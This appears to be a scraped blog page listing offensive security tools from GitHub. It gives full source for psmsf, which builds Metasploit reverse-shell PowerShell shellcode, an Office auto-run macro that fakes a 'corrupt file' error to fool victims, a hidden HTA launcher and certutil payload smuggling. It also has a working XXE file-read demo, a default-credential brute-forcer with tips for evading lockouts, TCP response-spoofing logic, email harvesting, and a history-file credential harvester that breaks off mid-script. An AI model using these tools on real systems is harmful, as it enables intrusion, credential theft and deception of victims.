	global Diretory , Files  , LFiles , IMGfiles , HTMfiles , Dangerfiles , FilesArray , HTMLoutput , HTMLoutputHotFiles , Directories , LinksArray , ParamArray
	try:
		parser = myhtmlparser()
		parser.feed(RequestToTarget(Patch))
		tags  = parser.NEWTAGS
		attrs = parser.NEWATTRS
		data  = parser.HTMLDATA
		parser.clean()
		LFiles = " Patch : "+Patch
		for attr in attrs:
			if True:
				for name, value in attr:
					if name == "href" or name == "src" :
						Objet = value
						if Objet != "/" and Objet!="":
							if Objet[-1:] == "/" and Objet[:1]!="/" and Objet[:4]!="http":
								Check = Patch+Objet in Diretory
								if Check == False:
									Directories+=1
									Diretory.append(Patch+Objet)
							else:
								if Objet[-4:]==".png" or Objet[-4:]==".jpg" or Objet[-4:]==".ico" or Objet[-4:]==".git":
									IMGfiles+=1
								if Objet[-4:]==".html" or Objet[-4:]==".htm" or Objet[-4:]==".html5":
									HTMfiles+=1
								if Objet[-4:]==".php" or Objet[-4:]==".php5" or Objet[-4:]==".sql" or Objet[-4:]==".txt":
									Dangerfiles+=1
									FilesArray+="\t["+Objet+"]\n"
									HTMLoutputHotFiles+="\t<tr><td><font style='background-color:red;color:white;'><a href='http://"+target+Patch+Objet+"' target='_blank'>"+Objet+"</td></font></tr>"
								if Objet[:4]=="http":
									LinksArray+="\t["+Objet+"]\n"
								if Objet.find("?") >= 0:
									ParamArray+="\t["+target+Patch+Objet+"]\n"
								LFiles+="\n\t|-"+Objet
								HTMLoutput+="\t<tr><td><a href='http://"+target+Patch+Objet+"' target='_blank'>"+Objet+"</td></tr>"

		print "\t ---------------------------"
	except:
		Patrin=2
	if Vervose != "false":
			print LFiles


if __name__=="__main__":
	print " ["+time.strftime('%c')+"] Starting Scanning to ("+target+") \n"
	print " ["+time.strftime('%H:%M:%S')+"] Scanning Folders of Target..."
	ParsingToSource(Patch)
	for D in Diretory:
		if D != Patch:
			ParsingToSource(D)

	if (FilesArray!=""):
		print ("\n [Warning Files]")
		print FilesArray
	if (LinksArray!=""):
		print ("\n [Links]")
		print LinksArray
	if (ParamArray!=""):
		print ("\n [Files with Parameters]")
		print ParamArray
	OutputHTML(HTMLoutput, HTMLoutputHotFiles)
	print ("\n [Staticts Files]")
	print (" | Folders  |  Imagen Files  |  HTML Files |  Warning Files | ")
	print (" |    "+str(Directories)+"\t    |     "+str(IMGfiles)+"\t     |   "+str(HTMfiles)+"\t   |      "+str(Dangerfiles)+"\t    |")
	print ("\n ["+time.strftime('%H:%M:%S')+"] Finshed, Report in Report["+target+"].html file.")

Source: https://github.com/RedToor

kisskissie – Simple proof of concept eXternal Xml Entity (XXE) scan and exfiltrate tool.

Kisskissie is a tool that makes automating XXE exfiltration easier. You should use it after you have confirmed that your target is vulnerable to XXE and you wish to exfiltrate as much data as quickly as you can.
TODO: Add more builtin attack templates. Add fuzzing capabilities. Move code into classes and general clean up.

kisskissie – XXE attack tool

Authentication
HTTP basic authentication is supported by default. Use the --auth-user flag to specify a username; you will be prompted for the password.

Templates
Some applications require custom template files for the smasher if they expect specific HTTP headers in the request or a specific XML format. Place these in templates/smasher; if you need to specify custom headers, the filename should end in .http (see example.http in that directory).
To select a template, use the --template flag. For example:

python2 kisskissie.py [...] --template example.http https://vuln.example.com/xml_processor
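The in-band XXE read that kisskissie automates, shown end to end as an added example (this is not kisskissie's code): a naive XML-consuming endpoint built on Python's xml.sax/expat with external general entities enabled leaks a local file into a parsed field, while the same parser with the feature left at its default returns nothing. The endpoint (FieldCollector), the document builder and the secret file are all constructed for the demo.

```python
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for a sensitive file the attacker wants to read.
SECRET_LINE = "root:x:0:0:root:/root:/bin/bash\n"


class FieldCollector(ContentHandler):
    """Gathers the text of each element, the way a naive XML-consuming endpoint would."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        self._current = name
        self.fields.setdefault(name, "")

    def characters(self, content):
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        self._current = None


def xxe_document(path):
    """Classic in-band XXE probe: an external general entity that points at a local file."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE data [<!ENTITY xxe SYSTEM "%s">]>\n'
        '<data><name>&xxe;</name></data>\n' % path
    )


def parse_fields(xml_text, resolve_external_entities):
    """Parse with expat through xml.sax; the feature flag is what makes the endpoint vulnerable."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = FieldCollector()
    parser.setContentHandler(handler)
    parser.feed(xml_text.encode("utf-8"))
    parser.close()
    return handler.fields


def run_demo():
    """Return (what the vulnerable parser leaks, what the hardened parser returns)."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    try:
        with os.fdopen(fd, "w") as f:
            f.write(SECRET_LINE)
        doc = xxe_document(path)
        leaked = parse_fields(doc, resolve_external_entities=True)["name"]
        hardened = parse_fields(doc, resolve_external_entities=False)["name"]
    finally:
        os.remove(path)
    return leaked, hardened
```

The only difference between the leaking and the safe parse is feature_external_ges, which xml.sax leaves off by default; the same knob in lxml is resolve_entities=False on XMLParser. Once a target answers this probe with file contents, a tool like kisskissie is only looping over paths and templates.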

usage:

git clone https://github.com/muttiopenbts/kisskissie && cd kisskissie
./kisskissie.py -h

Source: https://github.com/muttiopenbts

PSMSF – create powershell shell code used in cmd console with Metasploit Framework.


Notice: For educational purposes only!
PSMSF helps generate payloads or files usable from a cmd console, a browser and similar entry points with the Metasploit Framework. If you are familiar with the Windows cmd console, you can use the results in different scenarios.

powershell attack

psmsf has four attack types (ps, mac, crt, hta):
+ powershell / macro attack: Generate a powershell shellcode command, a msfconsole resource script and (for mac) an Office macro that runs it.
+ cert attack: Translate a binary file into a text certificate file, and restore the cert file to a binary file on target machines with certutil.
+ hta attack: Generate an HTA html page. When victims open the page in Internet Explorer, the embedded command runs on their machine.

helper command

Usage:

make sure the Metasploit Framework is installed on your Unix/Linux system.
git clone https://github.com/all3g/psmsf && cd psmsf
python psmsf.py

Script:

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Please Install Metasploit-Framework first,
# Kali Linux:       apt-get install metasploit-framework
# Notice:           Just for educational purposes
# License:          BSD License

import logging
import subprocess
import base64
import re
import os
import sys
from optparse import OptionParser
from optparse import OptionGroup
from optparse import OptionError


logging.basicConfig(level=logging.INFO, format="[+] %(message)16s")


def write_file(filename, data):
    """Write data into file"""
    with open(filename, 'w') as f:
        f.write(data)


def read_file(filename):
    """Read data from file"""
    with open(filename, "rb") as f:
        data = f.read()
    return data


def execute_command(command):
    """Execute OS Command"""
    logging.debug("Executes command: %s" % command)
    proc = subprocess.Popen(command,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            shell=True)
    data = proc.communicate()[0]
    return data


def extract_msf_shellcode(shellcode):
    """Filter some bad chars in shellcode"""
    replaces = {';': '',
                ' ': '',
                '+': '',
                '"': '',
                '\n': '',
                'buf=': '',
                'Found 0 compatible encoders': '',
                'unsignedcharbuf[]=': ''}
    for key, value in replaces.iteritems():
        shellcode = shellcode.replace(key, value)

    shellcode = shellcode.rstrip()
    return shellcode


def generate_msf_shellcode(payload, host, port):
    """generate shellcode: \x00\x00\x00...."""
    logging.debug("Metasploit Framework generates shellcode")
    command = ("msfvenom "
               "-p %s "
               "LHOST=%s "
               "LPORT=%s "
               "StagerURILength=5 "
               "StagerVerifySSLCert=false "
               "-e x86/shikata_ga_nai "
               "-a x86 "
               "--platform windows "
               "--smallest "
               "-f c") % (payload, host, port)
    shellcode = execute_command(command)

    return extract_msf_shellcode(shellcode)


def generate_powershell_script(shellcode):
    shellcode = ("$1 = '$c = ''"
                 "[DllImport(\"kernel32.dll\")]"
                 "public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);"
                 "[DllImport(\"kernel32.dll\")]"
                 "public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);"
                 "[DllImport(\"msvcrt.dll\")]"
                 "public static extern IntPtr memset(IntPtr dest, uint src, uint count);"
                 "'';"
                 "$w = Add-Type -memberDefinition $c -Name \"Win32\" -namespace Win32Functions -passthru;"
                 "[Byte[]];[Byte[]]"
                 "$z = %s;"
                 "$g = 0x1000;"
                 "if ($z.Length -gt 0x1000){$g = $z.Length};"
                 "$x=$w::VirtualAlloc(0,0x1000,$g,0x40);"
                 "for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};"
                 "$w::CreateThread(0,0,$x,0,0,0);"
                 "for (;;){Start-sleep 60};';"
                 "$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));"
                 "$2 = \"-enc \";"
                 # the shellcode is x86, so on a 64-bit host run it under the 32-bit (SysWOW64) PowerShell
                 "if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + \"\\syswow64\\WindowsPowerShell\\v1.0\\powershell\";iex \"& $3 $2 $e\"}else{;iex \"& powershell $2 $e\";}" % shellcode)

    return shellcode


def generate_powershell_command(shellcode):
    shellcode = base64.b64encode(shellcode.encode('utf_16_le'))
    return "powershell -window hidden -enc %s" % shellcode


def generate_powershell_attack(payload, host, port):
    """generate shellcode: 0x00,0x00,0x00,..."""
    shellcode = generate_msf_shellcode(payload, host, port)
    shellcode = re.sub("\\\\x", "0x", shellcode)

    counter = 0
    floater = ""
    newdata = ""

    for line in shellcode:
        floater += line
        counter += 1
        if counter == 4:
            newdata = newdata + floater + ","
            floater = ""
            counter = 0

    shellcode = newdata[:-1]
    shellcode = generate_powershell_script(shellcode)
    powershell_cmd = generate_powershell_command(shellcode)

    msfcommand = ("use exploit/multi/handler\n"
                  "set payload %s\n"
                  "set LHOST %s\n"
                  "set LPORT %s\n"
                  "set ExitOnSession false\n"
                  "set EnableStageEncoding true\n"
                  "exploit -j\n") % (payload, host, port)

    ps_dirname = "powershell_attack"
    ps_msf_filename = "powershell_msf.rc"
    ps_script_filename = "powershell_hacking.bat"

    if not os.path.isdir(ps_dirname): os.makedirs(ps_dirname)
    logging.info('create msfconsole resource script')
    write_file("%s/%s" % (ps_dirname, ps_msf_filename), msfcommand)

    logging.info('create powershell shellcode command')
    write_file("%s/%s" % (ps_dirname, ps_script_filename), powershell_cmd)

    return powershell_cmd, msfcommand


def generate_cert_attack(filename):
    if not os.path.isfile(filename):
        logging.info("Please set a file for cert attack")
        sys.exit()

    crt_dirname = "cert_attack"
    crt_encode_filename = "cert_encode.crt"
    crt_decode_filename = "cert_decode.bat"

    crt_encode_filepath = "%s/%s" % (crt_dirname, crt_encode_filename)
    if not os.path.isdir(crt_dirname): os.makedirs(crt_dirname)
    if os.path.isfile(crt_encode_filepath): os.remove(crt_encode_filepath)

    # Translate a binary file to coreutil prep format.
    data = read_file(filename)
    data = base64.b64encode(data)
    data = ("-----BEGIN CERTIFICATE-----\n"
            "%s\n"
            "-----END CERTIFICATE-----" % data)
    logging.info('encode a binary file to a cert file')
    write_file(crt_encode_filepath, data)

    # Create a windows batch decode script (.bat)
    crt_decode_script_filepath = "%s/%s" % (crt_dirname, crt_decode_filename)
    data = "certutil -decode %s encoded.exe" % crt_encode_filename
    logging.info('create a windows batch script for decode')
    write_file(crt_decode_script_filepath, data)



def generate_hta_attack(command):
    hta_module = "module.hta"
    hta_index = "index.html"
    hta_dirname = "windows_hta_attack"

    hta_module_code = ("<script>\n"
            "a=new ActiveXObject(\"WScript.Shell\");\n"
            "a.run('%%windir%%\\\\System32\\\\cmd.exe /c %s', 0);"
            "window.close();\n</script>" % command)

    hta_index_code = ("<iframe "
            "id=\"frame\" "
            "src=\"%s\" "
            "application=\"yes\" "
            "width=0 height=0 style=\"hidden\" "
            "frameborder=0 marginheight=0 "
            "marginwidth=0 scrolling=no></iframe>" % hta_module)

    if not os.path.isdir(hta_dirname): os.makedirs(hta_dirname)

    logging.info('create hta index file')
    write_file("%s/%s" % (hta_dirname, hta_index), hta_index_code)

    logging.info('create hta module file')
    write_file("%s/%s" % (hta_dirname, hta_module), hta_module_code)

    return hta_index_code, hta_module_code


def generate_macro_attack(shellcode, line_length=300):
    # VBA has a line length limit, so split the powershell command into quoted chunks
    # joined with "&" and the " _" line-continuation character.
    data = ""
    cmd_list = [shellcode[i: i+line_length] for i in range(0, len(shellcode), line_length)]
    for line in cmd_list:
        data += "& \"" + line + "\" _\n"

    data = data[:-3]                     # drop the trailing " _\n" of the last chunk
    data = data.replace("&", "", 1)      # the first chunk is not preceded by "&"

    macro = ("Sub Auto_Open()\n"
             "Dim x\n"
             "x = %s\n"
             "Shell (\"POWERSHELL.EXE \" & x)\n"
             "Dim title As String\n"
             "title = \"Critical Microsoft Office Error\"\n"
             "Dim msg As String\n"
             "Dim intResponse As Integer\n"
             "msg = \"This document appears to be corrupt or missing critical "
             "rows in order to restore. Please restore this file from a backup.\"\n"
             "intResponse = MsgBox(msg, 16, title)\n"
             "Application.Quit\n"
             "End Sub" % data)

    logging.info("\n%s" % macro)
    return macro


def powershell_attack_help():
    doc = ("Everything is now generated in two files, ex:\n"
           "    powershell_hacking.bat - shellcode can be executed in cmd console.\n"
           "                           - Usage: cmd.exe /c powershell_hacking.bat\n"
           "    powershell_msf.rc      - msfconsole resource script.\n"
           "                           - Usage: msfconsole -r powershell_msf.rc\n")
    logging.info(doc)
    logging.info("python psmsf.py --attacktype ps --payload windows/shell/reverse_tcp --lhost 192.168.1.100 --lport 8443")
    logging.info("python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_tcp --lhost 192.168.1.100 --lport 8443")
    logging.info("python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_http --lhost 192.168.1.100 --lport 8443")


def cert_attack_help():
    doc = ("The certutil attack vector was identified by Matthew Graeber (@mattifestation) "
           "which allows you to take a binary file, move it into a base64 format and "
           "use certutil on the victim machine to convert it back to a binary for you. "
           "This should work on virtually any system and allow you to transfer a binary "
           "to the victim machine through a fake certificate file. To use this attack, "
           "pass the binary to encode with --filename, ex:")
    logging.info(doc)
    logging.info("python psmsf.py --attacktype crt --filename demo.exe")


def hta_attack_help():
    doc = ("The HTA attack will automatically generate two files, ex:\n"
           "    index.html             - redirects browsers to use module.hta\n"
           "    module.hta             - contains the malicious code\n"
           "                           - Usage: http://x.x.x.x/windows_hta_attack/index.html"
    )
    logging.info(doc)
    logging.info("python psmsf.py --attacktype hta whoami")


def macro_attack_help():
    doc = ("The Macro attack generates a new macro. Create a macro in the Office document, "
           "call it Auto_Open and paste the generated code into it; it then runs automatically "
           "when the document is opened. Note that a message will prompt the user saying that "
           "the file is corrupt, and the Excel document closes automatically. THIS IS NORMAL "
           "BEHAVIOR! It tricks the victim into thinking the Excel document is corrupted. "
           "You should get a shell through the powershell injection after that."
    )
    logging.info(doc)
    logging.info("python psmsf.py --attacktype mac --payload windows/shell/reverse_tcp --lhost 192.168.1.100 --lport 8443")
    logging.info("python psmsf.py --attacktype mac --payload windows/meterpreter/reverse_tcp --lhost 192.168.1.100 --lport 8443")
    logging.info("python psmsf.py --attacktype mac --payload windows/meterpreter/reverse_http --lhost 192.168.1.100 --lport 8443")


def banner():
    banner = """
     ######
      #     #  ####  #    #  ####  ######
       #     # #      ##  ## #      #
        ######   ####  # ## #  ####  #####
         #            # #    #      # #
          #       #    # #    # #    # #
           #        ####  #    #  ####  #
    """

    logging.info(banner)
    return banner


def help():
    usage = "python %prog [options]"
    parser = OptionParser(usage=usage)

    try:
        parser.add_option('--attacktype', dest='attacktype', help='Attack Types are supported. (ps, crt, hta, mac)')

        powershell_opts = OptionGroup(parser, "Powershell/Macro Attack", "Generate metasploit console script / macro")
        powershell_opts.add_option('--payload', dest='payload', type='str', help='payload of metasploit framework')
        powershell_opts.add_option('--lhost', dest='lhost', type='str', help='lhost for payload of metasploit framework')
        powershell_opts.add_option('--lport', dest='lport', type='int', help='lport for payload of metasploit framework')
        parser.add_option_group(powershell_opts)

        crt_opts = OptionGroup(parser, "CERT Attack", "Translate a binary file into a text certification file, and restore the cert file to a binary file on target machines")
        crt_opts.add_option('--filename', dest='filename', type='str', help='file to be encoded to a certification')
        parser.add_option_group(crt_opts)

        hta_opts = OptionGroup(parser, "HTA Attack", "Generate HTA html page. When victims access HTA page, os will be attacked from Internet Explorer")
        hta_opts.add_option('--command', dest='command', type='str', help='command of attack mode')
        parser.add_option_group(hta_opts)

        (args, _) = parser.parse_args()
    except (OptionError, TypeError) as e:
        parser.error(e)
    else:
        return args


if __name__ == "__main__":
    args = help()
    if not args.attacktype:
        banner()
        logging.info('Please -h or --help for more details')
        sys.exit()

    attacktype = args.attacktype.lower()

    if attacktype == 'ps':
        if args.payload and args.lhost and args.lport:
            generate_powershell_attack(args.payload, args.lhost, args.lport)
        else:
            banner()
            powershell_attack_help()

    elif attacktype == 'mac':
        if args.payload and args.lhost and args.lport:
            powershell_cmd, msfcommand = generate_powershell_attack(args.payload, args.lhost, args.lport)
            generate_macro_attack(powershell_cmd)
        else:
            banner()
            macro_attack_help()

    elif attacktype == 'crt':
        if args.filename:
            generate_cert_attack(args.filename)
        else:
            banner()
            cert_attack_help()

    elif attacktype == 'hta':
        if args.command:
            generate_hta_attack(args.command)
        else:
            banner()
            hta_attack_help()
    else:
        banner()
        logging.info('Please -h or --help for more details')

Source: https://github.com/all3g

scansploit – Tool to embed exploits into barcodes.


Tool for Injecting Malicious Payloads Into Barcodes
Barcode Support:
+ Barcodes (code128)
+ QRCodes
+ DataMatrix
+ EAN13

scansploit

Requirements
+ Python3
+ PyStrich: pip3 install pystrich
  (in case of a JPEG error: sudo apt-get install libtiff5-dev zlib1g-dev libfreetype6-dev liblcms2-dev libwebp-dev tcl8.6-dev tk8.6-dev python-tk)
+ Pillow: pip3 install pillow

Usage:

git clone https://github.com/huntergregal/scansploit && cd scansploit
python3 scansploit.py

Source: https://github.com/huntergregal

EmailHarvester is A tool to retrieve Domain email addresses from Search Engines.


EmailHarvester is a tool to retrieve domain email addresses from search engines.
Requirements:
– Python 3.x
– termcolor
– colorama
– requests

Latest change v1.3.0:
+ Exclude plugins when you choose to search in all search engines and sites
+ List available plugins

EmailHarvester v1.3.0

Features
+ Retrieve Domain email addresses from Search Engines (Google, Bing, Yahoo, ASK, Baidu, Dogpile, Exalead).
+ Export results to txt and xml files.
+ Limit search results.
+ Define your own User-Agent string.
+ Use proxy server.
+ Plugins system.
+ Search in popular web sites using Search engines (Twitter, LinkedIn, Google+).
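What the harvesting step reduces to once a search-engine result page is in hand, as an added example (not EmailHarvester's code; SAMPLE_PAGE is constructed HTML): undo the two encodings that hide "@" from a naive regex, normalise the common "[at]"/"[dot]" obfuscation, then keep only addresses on the target domain (optionally its subdomains), deduplicated and sorted.

```python
import re
from html import unescape
from urllib.parse import unquote

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# "user [at] host [dot] tld" style obfuscation seen on contact pages and in search snippets
OBFUSCATED_RE = re.compile(
    r"([A-Za-z0-9._%+-]+)\s*(?:\[at\]|\(at\)|\s+at\s+)\s*([A-Za-z0-9.-]+)\s*(?:\[dot\]|\(dot\)|\s+dot\s+)\s*([A-Za-z]{2,})",
    re.IGNORECASE)

# Constructed result page: mailto link, entity and percent encoding, obfuscation, noise, duplicates.
SAMPLE_PAGE = """
<a href="mailto:alice%40example.com">Alice</a>
<p>Bob: bob&#64;example.com (also listed as BOB@example.com)</p>
<p>Carol: carol [at] example [dot] com</p>
<p>Support: help@mail.example.com. Partners: spam@other.org</p>
"""


def normalise_page(html):
    """Decode HTML entities (&#64;) and percent-encoding (%40), then rewrite obfuscated forms."""
    text = unquote(unescape(html))
    return OBFUSCATED_RE.sub(lambda m: "%s@%s.%s" % (m.group(1), m.group(2), m.group(3)), text)


def extract_emails(html, domain, include_subdomains=True):
    """Sorted, deduplicated addresses on `domain` found in one result page."""
    domain = domain.lower()
    found = set()
    for addr in EMAIL_RE.findall(normalise_page(html)):
        addr = addr.lower().rstrip(".")
        host = addr.rsplit("@", 1)[1]
        if host == domain or (include_subdomains and host.endswith("." + domain)):
            found.add(addr)
    return sorted(found)
```

Run this over every page the search plugins fetch and union the results; the domain filter is what keeps the third-party addresses that litter result pages out of the report.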

Download/Installation:

git clone https://github.com/maldevel/EmailHarvester && cd EmailHarvester
pip3 install -r requirements.txt --user
python3 EmailHarvester.py -h

Download: 1.3.0.zip | 1.3.0.tar.gz
Source: https://github.com/maldevel

RouterSploit v2.0.0 – Router Exploitation Framework.


Latest change 24/4/2016, version 2.0.0:
+ Interpreter: new release, Bad Blood 2.0.0
+ multi_run() as a decorator.
+ modules: exit and quit commands for the cmd loop.
+ creds: support for targets from file.
+ scanners: fixed new-line issue with print_success.

routersploit v2.0.0

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.
It consists of various modules that aid penetration testing operations:
+ exploits – modules that take advantage of identified vulnerabilities
+ creds – modules designed to test credentials against network services
+ scanners – modules that check whether a target is vulnerable to any exploit
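What a creds module does at its core, as an added example that is not RouterSploit's code: parse a targets file (one host[:port] per line, the "targets from file" feature above), try a list of default credentials against an HTTP Basic-auth admin page and report the first pair accepted. The device is a constructed loopback stand-in (_FakeRouter) so the block runs offline; DEFAULT_CREDS is a constructed list.

```python
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Constructed default-credential list of the kind a creds module iterates over.
DEFAULT_CREDS = [("admin", "admin"), ("admin", "password"), ("root", "root"), ("admin", "1234")]


def load_targets(text):
    """Parse a targets file: one host[:port] per line; blank lines and # comments are ignored."""
    targets = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        host, _, port = line.partition(":")
        targets.append((host, int(port) if port else 80))
    return targets


def try_basic_auth(host, port, user, password, path="/", timeout=3):
    """True if the device accepts user:password through HTTP Basic authentication."""
    token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode("ascii")
    req = Request("http://%s:%d%s" % (host, port, path), headers={"Authorization": "Basic " + token})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.getcode() == 200
    except HTTPError as err:
        if err.code in (401, 403):
            return False
        raise


def brute_force(host, port, creds=DEFAULT_CREDS):
    """Return the first (user, password) pair the service accepts, or None."""
    for user, password in creds:
        if try_basic_auth(host, port, user, password):
            return (user, password)
    return None


def sweep(targets_text, creds=DEFAULT_CREDS):
    """Run the credential test against every host in a targets file; map 'host:port' -> hit."""
    hits = {}
    for host, port in load_targets(targets_text):
        hit = brute_force(host, port, creds)
        if hit:
            hits["%s:%d" % (host, port)] = hit
    return hits


class _FakeRouter(BaseHTTPRequestHandler):
    """Constructed stand-in for an embedded device's admin page behind Basic auth (admin:1234)."""
    VALID = "Basic " + base64.b64encode(b"admin:1234").decode("ascii")

    def do_GET(self):
        if self.headers.get("Authorization") == self.VALID:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"<title>Router admin</title>")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="router"')
            self.end_headers()

    def log_message(self, *args):   # keep the demo quiet
        pass


def run_demo():
    """Start the fake device on a loopback port, sweep it from a targets file, return the hits."""
    srv = HTTPServer(("127.0.0.1", 0), _FakeRouter)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    host, port = srv.server_address
    try:
        return sweep("# lab devices\n%s:%d\n" % (host, port))
    finally:
        srv.shutdown()
        srv.server_close()
```

Against real devices, keep the credential list short and the timeout generous: embedded web servers lock up or rate-limit after a handful of failures, and a module that hammers them loses the hit it would otherwise have found.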

Usage:

pacman -S python-requests python-paramiko python-netsnmp (arch linux)
yum install python-requests python-paramiko python-netsnmp (centos/fedora)
sudo apt-get install python-requests python-paramiko python-netsnmp (debian/ubuntu)
git clone https://github.com/reverse-shell/routersploit && cd routersploit
pip2 install -r requirements.txt
./rsf.py

Update:
git pull origin master

Source: https://github.com/reverse-shell | Our Post before


QuantumInject – Packet injection and detection using python.


QuantumInject captures traffic from a network interface in promiscuous mode and attempts to inject spoofed responses to selected client requests towards TCP services.

quantuminject

The program conforms to the following specification:
quantuminject.py [-i interface] [-r regexp] [-d datafile] [-b filter] expression
-i Listen on network device <interface> (e.g., eth0). If not specified, quantuminject selects a default interface to listen on. The same interface is used for packet injection.
-r Use regular expression <regexp> to match the request packets for which a response will be spoofed.
-d Read the raw data that will be used as the TCP payload of the spoofed response packet from <datafile>.
-b <expression> is a BPF filter that specifies a subset of the traffic to be monitored. This option is useful for targeting a single IP address, a single service, etc.
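The arithmetic behind the spoofed response, as an added example (not QuantumInject's code; capture and injection of the segment are left to scapy): from the fields of a client's request segment, the forged reply must come from the server's address and port, carry seq equal to the request's ack and ack equal to the request's seq plus the sequence space the request consumed, or the client's TCP stack discards it. SAMPLE_REQUEST and SAMPLE_PAYLOAD are constructed.

```python
import re

# Constructed request segment, as a sniffer would hand it over (seq/ack are raw 32-bit values).
SAMPLE_REQUEST = {
    "src": "10.0.0.5", "sport": 51234,
    "dst": "198.51.100.7", "dport": 80,
    "seq": 1000, "ack": 5000, "flags": "PA",
    "data": b"GET /index.html HTTP/1.1\r\nHost: victim.example\r\n\r\n",
}

SAMPLE_PAYLOAD = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 7\r\n"
                  b"Connection: close\r\n\r\nspoofed")


def request_matches(segment, pattern):
    """The -r check: does the request payload match the operator's regular expression?"""
    return re.search(pattern.encode("utf-8"), segment["data"]) is not None


def sequence_space_consumed(segment):
    """Bytes of sequence space a segment uses: its payload plus one each for SYN and FIN."""
    return len(segment["data"]) + int("S" in segment["flags"]) + int("F" in segment["flags"])


def build_spoofed_response(request, payload):
    """Fields of a reply the client accepts as the real server's: addresses and ports swapped,
    seq = the request's ack (the next byte the client expects from the server),
    ack = the request's seq plus what the request consumed (acknowledging the request)."""
    return {
        "src": request["dst"], "sport": request["dport"],
        "dst": request["src"], "dport": request["sport"],
        "seq": request["ack"],
        "ack": (request["seq"] + sequence_space_consumed(request)) & 0xFFFFFFFF,
        "flags": "PA",          # PSH|ACK: deliver the payload and acknowledge the request
        "data": payload,
    }


def inject_if_match(request, pattern, payload):
    """Per-request step of the sniff loop: the forged reply, or None when -r does not match.
    The forgery only wins if it reaches the client before the genuine reply; the genuine
    segment then arrives in already-acknowledged sequence space and is dropped as a duplicate."""
    if not request_matches(request, pattern):
        return None
    return build_spoofed_response(request, payload)
```

The race is the whole game: the spoofed segment has to leave the injecting host before the real server's first data segment reaches the client, which is why the tool listens and injects on the same interface and why a tight BPF filter (-b) matters more than a clever regex.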

behind Ayad Code

Requirements:
+ any Linux platform
+ Python with scapy
+ sqlalchemy

Usage:

git clone https://github.com/zare3/QuantumInject && cd QuantumInject
python quantuminject.py -h
cd AyadCode
python main.py -h for another expression

Source: https://github.com/zare3

MacroShop – Collection of scripts to aid in delivering payloads via Office Macros.


Collection of scripts to aid in delivering payloads via Office macros. Most are Python.
1. macro_safe.py
Generates output safe for VB inclusion into an Excel spreadsheet. Requires a batch file generated by Veil-Evasion powershell payloads. To include it, enable the developer menu in Office, open the Visual Basic tab, double click on This_Workbook and paste the contents of the output file. Syntax: python macro_safe.py test.bat test.txt
2. exeinvba.py
Generates VB code for including and unpacking a portable executable onto the file system for delivery via an Office macro. To include it, enable the developer menu in Office, open the Visual Basic tab, double click on This_Workbook and paste the contents of the output file. Requires a PE. Syntax: python exeinvba.py --exe test.exe --out test.vb [--dest "C:\Users\Public\Documents\test.exe"]. Ensure any backslashes are escaped in the dest variable.
3. macro_safe_old.py
Same as macro_safe.py, but uses powershell instead of VB for architecture detection to call the correct version of powershell.
4. b64_enc.py
Watered-down version of exeinvba.py that outputs both the raw base64 string of the executable and the variable-specific section of the VB. May be useful with different VB templates or other methods that need an executable passed as a base64 string. Output is stored in base64_output.txt (raw) and base64_output.vb. Syntax: python b64_enc.py test.exe

Latest change 27/5/2016:
+ test.vb : line increase for exeinvba
+ exeinvba.py: Comment CleaneUp

usage:

git clone https://github.com/khr0x40sh/MacroShop && cd MacroShop
then you can run one by one what do you need.

Source: https://github.com/khr0x40sh

Inspector is an Privilege Escalation unix helper (Forensics, Kernel exploit list, process).


Inspector is a Unix privilege-escalation helper (forensics, kernel exploit list, process listing) with the following functions:
+ History files: MySQL and shell history
+ Forensic escalation (credentials and connections found in history)
+ Process manager

Requirements:
+ Python 2.7.x
+ any Linux platform

usage:

wget https://raw.githubusercontent.com/graniet/Inspector/master/inspector.py
python inspector.py

Script:

#!/usr/bin/env python

import os,sys

# Global #######
file_history = []
no_can_open = 0
uname = ""
process_list = ""
kernel_version = ""
history_listing = ['.bash_history','.mysql_history','.bashrc','.zshrc','.zsh_history']
################

def prez():
	print """  _____                           _             
  \_   \_ __  ___ _ __   ___  ___| |_ ___  _ __ 
   / /\/ '_ \/ __| '_ \ / _ \/ __| __/ _ \| '__|
/\/ /_ | | | \__ \ |_) |  __/ (__| || (_) | |   
\____/ |_| |_|___/ .__/ \___|\___|\__\___/|_|   
                 |_|                            
{c} Github.com/Graniet"""

# home directories searched for shell / MySQL history files (Linux and macOS layouts)
home_dirs = ['/home', '/root', '/Users']

def find_files(name):
	"""Return the paths of every file called `name` below the known home directories."""
	cmd = 'find ' + ' '.join(home_dirs) + ' -name "' + name + '" -type f -print 2>/dev/null'
	return [line for line in os.popen(cmd).read().split('\n') if line != '']

def getShell():
	if find_files('.bashrc'):
		return "bash"
	elif find_files('.zshrc'):
		return "zsh"
	else:
		return "sh?"

def printHistoryFiles(files, label):
